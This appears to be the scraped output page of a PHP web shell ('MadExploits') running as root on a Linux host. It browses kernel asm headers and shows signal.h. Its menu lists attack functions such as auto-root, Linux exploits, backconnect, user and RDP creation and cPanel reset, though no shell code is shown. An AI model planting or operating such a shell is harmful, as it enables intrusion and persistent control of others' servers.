Linux r-1tbfree-gecko-e8ip2zsa-2f967-wvg4t 6.12.63-84.121.amzn2023.x86_64 #1 SMP PREEMPT_DYNAMIC Wed Dec 31 02:07:30 UTC 2025 x86_64
PHP/8.5.2 (Development Server)
: | : 10.16.21.217
Cant Read [ /etc/named.conf ]
8.5.2
root
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
include /
hppa-linux-gnu /
asm /
[ HOME SHELL ]
Name
Size
Permission
Action
auxvec.h
198
B
-rw-r--r--
bitsperlong.h
302
B
-rw-r--r--
bpf_perf_event.h
40
B
-rw-r--r--
byteorder.h
194
B
-rw-r--r--
cachectl.h
354
B
-rw-r--r--
errno.h
5.5
KB
-rw-r--r--
fcntl.h
1
KB
-rw-r--r--
ioctl.h
1.67
KB
-rw-r--r--
ioctls.h
3.67
KB
-rw-r--r--
ipcbuf.h
837
B
-rw-r--r--
mman.h
3.79
KB
-rw-r--r--
msgbuf.h
1.22
KB
-rw-r--r--
param.h
31
B
-rw-r--r--
pdc.h
24.45
KB
-rw-r--r--
poll.h
30
B
-rw-r--r--
posix_types.h
639
B
-rw-r--r--
ptrace.h
2.74
KB
-rw-r--r--
resource.h
34
B
-rw-r--r--
sembuf.h
908
B
-rw-r--r--
setup.h
173
B
-rw-r--r--
shmbuf.h
1.45
KB
-rw-r--r--
sigcontext.h
557
B
-rw-r--r--
siginfo.h
33
B
-rw-r--r--
signal.h
1.73
KB
-rw-r--r--
socket.h
4.09
KB
-rw-r--r--
sockios.h
33
B
-rw-r--r--
stat.h
1.76
KB
-rw-r--r--
statfs.h
181
B
-rw-r--r--
swab.h
30
B
-rw-r--r--
termbits.h
3.54
KB
-rw-r--r--
termios.h
33
B
-rw-r--r--
types.h
31
B
-rw-r--r--
unistd.h
277
B
-rw-r--r--
unistd_32.h
10.62
KB
-rw-r--r--
unistd_64.h
9.93
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : signal.h
/* SPDX-License-Identifier: GPL-2.0 WITH Linux-syscall-note */ #ifndef _ASM_PARISC_SIGNAL_H #define _ASM_PARISC_SIGNAL_H #define SIGHUP 1 #define SIGINT 2 #define SIGQUIT 3 #define SIGILL 4 #define SIGTRAP 5 #define SIGABRT 6 #define SIGIOT 6 #define SIGSTKFLT 7 #define SIGFPE 8 #define SIGKILL 9 #define SIGBUS 10 #define SIGSEGV 11 #define SIGXCPU 12 #define SIGPIPE 13 #define SIGALRM 14 #define SIGTERM 15 #define SIGUSR1 16 #define SIGUSR2 17 #define SIGCHLD 18 #define SIGPWR 19 #define SIGVTALRM 20 #define SIGPROF 21 #define SIGIO 22 #define SIGPOLL SIGIO #define SIGWINCH 23 #define SIGSTOP 24 #define SIGTSTP 25 #define SIGCONT 26 #define SIGTTIN 27 #define SIGTTOU 28 #define SIGURG 29 #define SIGXFSZ 30 #define SIGUNUSED 31 #define SIGSYS 31 /* These should not be considered constants from userland. */ #define SIGRTMIN 32 #define SIGRTMAX _NSIG #define SA_ONSTACK 0x00000001 #define SA_RESETHAND 0x00000004 #define SA_NOCLDSTOP 0x00000008 #define SA_SIGINFO 0x00000010 #define SA_NODEFER 0x00000020 #define SA_RESTART 0x00000040 #define SA_NOCLDWAIT 0x00000080 #define SA_NOMASK SA_NODEFER #define SA_ONESHOT SA_RESETHAND #define MINSIGSTKSZ 2048 #define SIGSTKSZ 8192 #include <asm-generic/signal-defs.h> #define _NSIG 64 #define _NSIG_BPW (sizeof(unsigned long) * 8) #define _NSIG_WORDS (_NSIG / _NSIG_BPW) # ifndef __ASSEMBLY__ # include <linux/types.h> typedef unsigned long old_sigset_t; /* at least 32 bits */ typedef struct { unsigned long sig[_NSIG_WORDS]; } sigset_t; /* Avoid too many header ordering problems. */ struct siginfo; typedef struct sigaltstack { void *ss_sp; int ss_flags; __kernel_size_t ss_size; } stack_t; #endif /* !__ASSEMBLY */ #endif /* _ASM_PARISC_SIGNAL_H */
Close